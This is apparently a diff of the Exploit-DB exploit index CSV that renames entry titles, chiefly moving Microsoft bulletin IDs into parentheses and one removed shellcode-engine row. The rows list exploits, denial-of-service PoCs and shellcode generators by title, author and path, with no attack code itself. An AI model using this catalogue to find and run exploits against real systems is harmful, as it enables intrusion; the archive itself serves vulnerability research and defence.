 11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 shdrv.sys local kernel ring0 SYSTEM exploit",2010-01-22,mu-b,windows,local,0
 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote DoS/Crash Exploit",2010-01-22,"Zer0 Thunder",windows,dos,0
 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash PoC",2010-01-23,b0telh0,windows,dos,0
@ -11174,7 +11174,7 @@ id,file,description,date,author,platform,type,port
 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0
 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0
 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0
-12258,platforms/windows/dos/12258.py,"Proof of Concept for MS10-006 SMB Client-Side Bug",2010-04-16,"laurent gaffie",windows,dos,0
+12258,platforms/windows/dos/12258.py,"Windows - SMB Client-Side Bug Proof of Concept (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0
 12259,platforms/php/dos/12259.php,"PHP 5.3.x DoS",2010-04-16,ITSecTeam,php,dos,0
 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities",2010-04-16,JosS,php,webapps,0
 12261,platforms/windows/local/12261.rb,"Archive Searcher .zip Stack Overflow",2010-04-16,Lincoln,windows,local,0
@ -11400,7 +11400,7 @@ id,file,description,date,author,platform,type,port
 12515,platforms/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution Vulnerability",2010-05-05,"Sn!pEr.S!Te Hacker",php,webapps,0
 12516,platforms/windows/local/12516.py,"BaoFeng Storm M3U File Processing Buffer Overflow Exploit",2010-05-06,"Lufeng Li and Qingshan Li",windows,local,0
 12517,platforms/php/webapps/12517.txt,"GetSimple 2.01 LFI",2010-05-06,Batch,php,webapps,0
-12518,platforms/windows/dos/12518.pl,"Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005",2010-05-06,unsign,windows,dos,0
+12518,platforms/windows/dos/12518.pl,"Microsoft Paint Integer Overflow Vulnerability (DoS) (MS10-005)",2010-05-06,unsign,windows,dos,0
 12519,platforms/php/webapps/12519.txt,"AV Arcade Search Field XSS/HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps,0
 12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server <= 1.3.1 (login) Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0
 12521,platforms/php/webapps/12521.txt,"Factux LFI Vulnerability",2010-05-06,"ALTBTA ",php,webapps,0
@ -11727,7 +11727,6 @@ id,file,description,date,author,platform,type,port
 13284,platforms/generator/shellcode/13284.txt,"/bin/sh Polymorphic shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0
 13285,platforms/generator/shellcode/13285.c,"linux/x86 shellcode generator / null free",2008-08-19,BlackLight,generator,shellcode,0
 13286,platforms/generator/shellcode/13286.c,"Alphanumeric Shellcode Encoder Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0
 13287,platforms/generator/shellcode/13287.txt,"Download & Exec polymorphed shellcode Engine",2007-01-24,"YAG KOHHA",generator,shellcode,0
 13288,platforms/generator/shellcode/13288.c,"Utility for generating HTTP/1.x requests for shellcodes",2006-10-22,izik,generator,shellcode,0
 13289,platforms/generator/shellcode/13289.c,"Multi-Format Shellcode Encoding Tool - Beta 2.0 (w32)",2005-12-16,Skylined,generator,shellcode,0
 13290,platforms/hardware/shellcode/13290.txt,"Version-independent IOS shellcode",2008-08-21,"Andy Davis",hardware,shellcode,0
@ -12618,7 +12617,7 @@ id,file,description,date,author,platform,type,port
 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0
 14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0
 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0
-14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
+14413,platforms/windows/dos/14413.txt,"Internet Explorer 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0
 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0
 14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0
 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0
@ -12679,7 +12678,7 @@ id,file,description,date,author,platform,type,port
 14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 - SQL Injection Vulnerability",2010-07-27,"Salvatore Fresta",php,webapps,0
 14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0
 14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0
-14484,platforms/windows/dos/14484.html,"IE6 / 7 Remote Dos vulnerability",2010-07-27,"Richard leahy",windows,dos,0
+14484,platforms/windows/dos/14484.html,"Internet Explorer 6 / 7 Remote Dos vulnerability",2010-07-27,"Richard leahy",windows,dos,0
 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0
 14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability",2010-07-28,mywisdom,unix,remote,0
@ -13234,7 +13233,7 @@ id,file,description,date,author,platform,type,port
 15262,platforms/windows/dos/15262.txt,"Microsoft Office HtmlDlgHelper Class Memory Corruption",2010-10-16,"Core Security",windows,dos,0
 15263,platforms/windows/dos/15263.py,"ConvexSoft DJ Audio Mixer - Denial of Service Vulnerability",2010-10-16,"MOHAMED ABDI",windows,dos,0
 15264,platforms/aix/dos/15264.py,"PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)",2010-10-16,ZoRLu,aix,dos,0
-15265,platforms/asp/remote/15265.rb,"MS10-070 ASP.NET Padding Oracle File Download",2010-10-17,"Agustin Azubel",asp,remote,0
+15265,platforms/asp/remote/15265.rb,"ASP.NET Padding Oracle File Download (MS10-070)",2010-10-17,"Agustin Azubel",asp,remote,0
 15266,platforms/windows/remote/15266.txt,"Windows NTLM Weak Nonce Vulnerability",2010-10-17,"Hernan Ochoa",windows,remote,0
 15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite",2010-10-17,d0lc3,windows,dos,0
 15268,platforms/php/webapps/15268.txt,"WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability",2010-10-17,FuRty,php,webapps,0
@ -13254,7 +13253,7 @@ id,file,description,date,author,platform,type,port
 15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
 15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class – Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
 15290,platforms/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",jsp,webapps,0
-15292,platforms/windows/remote/15292.rb,"MS10-070 ASP.NET Auto-Decryptor File Download Exploit",2010-10-20,"Agustin Azubel",windows,remote,0
+15292,platforms/windows/remote/15292.rb,"ASP.NET Auto-Decryptor File Download Exploit (MS10-070)",2010-10-20,"Agustin Azubel",windows,remote,0
 15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0
 15295,platforms/php/webapps/15295.html,"sNews CMS Multiple XSS Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0
 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave player rcsL chunk memory corruption 0day",2010-10-21,Abysssec,windows,remote,0
@ -13755,7 +13754,7 @@ id,file,description,date,author,platform,type,port
 15891,platforms/php/webapps/15891.txt,"GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
 15892,platforms/php/webapps/15892.html,"YourTube 1.0 - CSRF Vulnerability (Add User)",2011-01-02,"AtT4CKxT3rR0r1ST ",php,webapps,0
 15893,platforms/php/webapps/15893.py,"amoeba cms 1.01 - Multiple Vulnerabilities",2011-01-02,mr_me,php,webapps,0
-15894,platforms/windows/dos/15894.c,"MS10-073 Windows Class Handling Vulnerability",2011-01-02,"Tarjei Mandt",windows,dos,0
+15894,platforms/windows/dos/15894.c,"Windows Class Handling Vulnerability (MS10-073)",2011-01-02,"Tarjei Mandt",windows,dos,0
 15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
 15896,platforms/php/webapps/15896.txt,"Sahana Agasti <= 0.6.4 - Multiple Remote File Inclusion",2011-01-03,n0n0x,php,webapps,0
 15897,platforms/windows/dos/15897.py,"Music Animation Machine MIDI Player Local Crash PoC",2011-01-03,c0d3R'Z,windows,dos,0
@ -13795,7 +13794,7 @@ id,file,description,date,author,platform,type,port
 15960,platforms/php/webapps/15960.txt,"Maximus CMS (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
 15961,platforms/php/webapps/15961.txt,"TinyBB 1.2 - SQL Injection Vulnerability",2011-01-10,Aodrulez,php,webapps,0
 15962,platforms/solaris/local/15962.c,"LOCAL SOLARIS KERNEL ROOT EXPLOIT (< 5.10 138888-01)",2011-01-10,peri.carding,solaris,local,0
-15963,platforms/windows/remote/15963.rb,"MS10-081: Windows Common Control Library (Comctl32) Heap Overflow",2011-01-10,"Nephi Johnson",windows,remote,0
+15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
 15966,platforms/php/webapps/15966.txt,"ExtCalendar 2 (calendar.php) SQL Injection Vulnerability",2011-01-11,"Lagripe-Dz and Mca-Crb",php,webapps,0
 15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0
@ -13809,8 +13808,8 @@ id,file,description,date,author,platform,type,port
 15975,platforms/windows/local/15975.py,"Nokia Multimedia Player 1.0 SEH Unicode Exploit",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0
 15979,platforms/php/webapps/15979.txt,"Joomla! Spam Mail Relay Vulnerability",2011-01-12,"Jeff Channell",php,webapps,0
 15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 HTTP Referer stored XSS",2011-01-12,"Saif El-Sherei",php,webapps,0
-15984,platforms/windows/remote/15984.html,"MS11-002: Microsoft Data Access Components Vulnerability",2011-01-12,"Peter Vreugdenhil",windows,remote,0
+15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components Vulnerability (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0
-15985,platforms/windows/local/15985.c,"MS10-073: Win32k Keyboard Layout Vulnerability",2011-01-13,"Ruben Santamarta ",windows,local,0
+15985,platforms/windows/local/15985.c,"Win32k - Keyboard Layout Vulnerability (MS10-073)",2011-01-13,"Ruben Santamarta ",windows,local,0
 15986,platforms/windows/dos/15986.py,"Blackmoon FTP 3.1 Build 1735,1736 DoS",2011-01-13,"Craig Freyman",windows,dos,0
 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
 15988,platforms/windows/dos/15988.py,"Objectivity/DB Lack of Authentication Remote Exploit",2011-01-14,"Jeremy Brown",windows,dos,0
@ -14137,11 +14136,11 @@ id,file,description,date,author,platform,type,port
 16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)",2010-09-28,metasploit,windows,remote,0
 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service NetpwPathCanonicalize Overflow",2011-02-17,metasploit,windows,remote,0
 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow",2010-07-03,metasploit,windows,remote,0
-16369,platforms/windows/remote/16369.rb,"Microsoft Services MS06-066 nwwks.dll",2010-05-09,metasploit,windows,remote,0
+16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,metasploit,windows,remote,0
 16370,platforms/windows/remote/16370.rb,"Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,metasploit,windows,remote,0
 16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service Overflow",2010-07-03,metasploit,windows,remote,0
 16372,platforms/windows/remote/16372.rb,"Microsoft Workstation Service NetpManageIPCConnect Overflow",2010-10-05,metasploit,windows,remote,0
-16373,platforms/windows/remote/16373.rb,"Microsoft Services MS06-066 nwapi32.dll",2010-08-25,metasploit,windows,remote,0
+16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,metasploit,windows,remote,0
 16374,platforms/windows/remote/16374.rb,"Microsoft Windows Authenticated User Code Execution",2010-12-02,metasploit,windows,remote,0
 16375,platforms/windows/remote/16375.rb,"Microsoft RRAS Service RASMAN Registry Overflow",2010-08-25,metasploit,windows,remote,0
 16376,platforms/windows/remote/16376.rb,"Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",2010-11-24,metasploit,windows,remote,0
@ -14349,7 +14348,7 @@ id,file,description,date,author,platform,type,port
 16578,platforms/windows/remote/16578.rb,"Internet Explorer createTextRange() Code Execution",2010-09-20,metasploit,windows,remote,0
 16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",2010-04-30,metasploit,windows,remote,0
-16581,platforms/windows/remote/16581.rb,"MS03-020 Internet Explorer Object Type",2010-08-25,metasploit,windows,remote,0
+16581,platforms/windows/remote/16581.rb,"Internet Explorer - Object Type (MS03-020)",2010-08-25,metasploit,windows,remote,0
 16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
 16583,platforms/windows/remote/16583.rb,"Internet Explorer Data Binding Memory Corruption",2010-09-20,metasploit,windows,remote,0
 16584,platforms/windows/remote/16584.rb,"RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",2010-06-15,metasploit,windows,remote,0
@ -14588,7 +14587,7 @@ id,file,description,date,author,platform,type,port
 16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server <= 5.0.6 - Buffer Overflow",2010-05-09,metasploit,windows,remote,2380
 16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25
 16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25
-16820,platforms/windows/remote/16820.rb,"MS03-046 Exchange 2000 XEXCH50 Heap Overflow",2010-11-11,metasploit,windows,remote,25
+16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,metasploit,windows,remote,25
 16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow",2010-06-22,metasploit,windows,remote,25
 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,metasploit,windows,remote,25
 16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 LDAP Buffer Overflow",2010-11-14,metasploit,windows,remote,389
@ -14912,7 +14911,7 @@ id,file,description,date,author,platform,type,port
 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0
 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0
 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0
-17177,platforms/windows/local/17177.rb,"MS Word - Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
+17177,platforms/windows/local/17177.rb,"MS Word 2003 - Record Parsing Buffer Overflow (meta) (MS09-027)",2011-04-16,"Andrew King",windows,local,0
 17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0
 17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0
 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0
@ -15095,7 +15094,7 @@ id,file,description,date,author,platform,type,port
 17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 DoS Exploit",2011-06-16,"Soroush Dalili",windows,dos,0
 17406,platforms/php/webapps/17406.txt,"Catalog Builder - Ecommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0
 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 persistent XSS via SQL Injection",2011-06-17,Saif,php,webapps,0
-17409,platforms/windows/remote/17409.rb,"MS11-050 IE mshtml!CObjectElement Use After Free",2011-06-17,metasploit,windows,remote,0
+17409,platforms/windows/remote/17409.rb,"Internet Explorer - mshtml!CObjectElement Use After Free (MS11-050)",2011-06-17,metasploit,windows,remote,0
 17410,platforms/php/webapps/17410.txt,"AiCart 2.0 - Multiple Vulnerabilities",2011-06-18,takeshix,php,webapps,0
 17411,platforms/php/webapps/17411.txt,"A Cool Debate 1.0.3 Component Joomla Local File Inclusion",2011-06-18,"Chip d3 bi0s",php,webapps,0
 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) SQL Injection Vulnerability",2011-06-19,CoBRa_21,php,webapps,0
@ -15153,7 +15152,7 @@ id,file,description,date,author,platform,type,port
 17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0
 17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0
 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
-17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
+17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS (MS09-053)",2011-07-03,"Myo Soe",windows,dos,0
 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0
 17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0
 17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
@ -15302,7 +15301,7 @@ id,file,description,date,author,platform,type,port
 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0
 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0
-17659,platforms/windows/remote/17659.rb,"MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",2011-08-13,metasploit,windows,remote,0
+17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,metasploit,windows,remote,0
 17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0
 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0
 17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x (4.6.5) SQL Injection Vulnerability",2011-08-13,"Aung Khant",php,webapps,0
@ -15578,9 +15577,9 @@ id,file,description,date,author,platform,type,port
 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0
 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0
 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
-17978,platforms/windows/dos/17978.txt,"MS11-077 .fon Kernel-Mode Buffer Overrun PoC",2011-10-13,"Byoungyoung Lee",windows,dos,0
+17978,platforms/windows/dos/17978.txt,"Windows - .fon Kernel-Mode Buffer Overrun PoC (MS11-077)",2011-10-13,"Byoungyoung Lee",windows,dos,0
 17980,platforms/php/webapps/17980.txt,"WordPress Contact Form plugin <= 2.7.5 - SQL Injection",2011-10-14,Skraps,php,webapps,0
-17981,platforms/windows/dos/17981.py,"MS11-064 TCP/IP Stack Denial of Service",2011-10-15,"Byoungyoung Lee",windows,dos,0
+17981,platforms/windows/dos/17981.py,"Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0
 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop .zap file Local Denial of Service Vulnerability",2011-10-15,Silent_Dream,windows,dos,0
 17983,platforms/php/webapps/17983.txt,"Wordpress Plugin Photo Album Plus <= 4.1.1 - SQL Injection Vulnerability",2011-10-15,Skraps,php,webapps,0
 17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0
@ -15619,7 +15618,7 @@ id,file,description,date,author,platform,type,port
 18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0
 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0
 18023,platforms/php/webapps/18023.java,"phpLDAPadmin 0.9.4b DoS",2011-10-23,Alguien,php,webapps,0
-18024,platforms/windows/dos/18024.txt,"MS11-077 Win32k Null Pointer De-reference Vulnerability PoC",2011-10-23,KiDebug,windows,dos,0
+18024,platforms/windows/dos/18024.txt,"Win32k Null Pointer De-reference Vulnerability PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0
 18025,platforms/multiple/dos/18025.txt,"Google Chrome Denial of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0
 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",2011-10-24,metasploit,windows,local,0
 18028,platforms/windows/dos/18028.py,"zFTP Server ""cwd/stat"" Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0
@ -15673,7 +15672,7 @@ id,file,description,date,author,platform,type,port
 18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0
 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader Local Root",2011-11-05,zx2c4,linux,local,0
-18087,platforms/windows/local/18087.rb,"MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",2011-11-05,metasploit,windows,local,0
+18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,metasploit,windows,local,0
 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0
 18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit - DEP Bypass",2011-11-07,pasta,windows,remote,0
 18090,platforms/php/webapps/18090.txt,"LabStoRe <= 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0
@ -15718,7 +15717,7 @@ id,file,description,date,author,platform,type,port
 18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
 18140,platforms/windows/dos/18140.txt,"win7 keylayout Blue Screen Vulnerability",2011-11-21,instruder,windows,dos,0
 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,metasploit,windows,local,0
-18143,platforms/windows/local/18143.rb,"MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow",2011-11-22,metasploit,windows,local,0
+18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,metasploit,windows,local,0
 18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 , DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0
 18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0
 18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0
@ -15873,7 +15872,7 @@ id,file,description,date,author,platform,type,port
 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,bsd,remote,0
 18370,platforms/multiple/dos/18370.txt,"php 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0
 18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection",2012-01-14,"Marco Batista",php,webapps,0
-18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability MS12-005",2012-01-14,"Byoungyoung Lee",windows,local,0
+18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution Vulnerability (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0
 18373,platforms/jsp/webapps/18373.txt,"Cloupia End-to-end FlexPod Management Directory Traversal",2012-01-15,"Chris Rock",jsp,webapps,0
 18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0
 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0
@ -15916,7 +15915,7 @@ id,file,description,date,author,platform,type,port
 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8& 2.9 - XSS/SQL Injections Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0
 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,metasploit,windows,remote,0
 18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 ""proc_deutf()"" Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0
-18426,platforms/windows/remote/18426.rb,"MS12-004 midiOutPlayNextPolyEvent Heap Overflow",2012-01-28,metasploit,windows,remote,0
+18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,metasploit,windows,remote,0
 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0
 18428,platforms/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection Vulnerability",2012-01-30,Dr.DaShEr,php,webapps,0
 18429,platforms/php/webapps/18429.pl,"4images 1.7.6 - 9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0
@ -16095,7 +16094,7 @@ id,file,description,date,author,platform,type,port
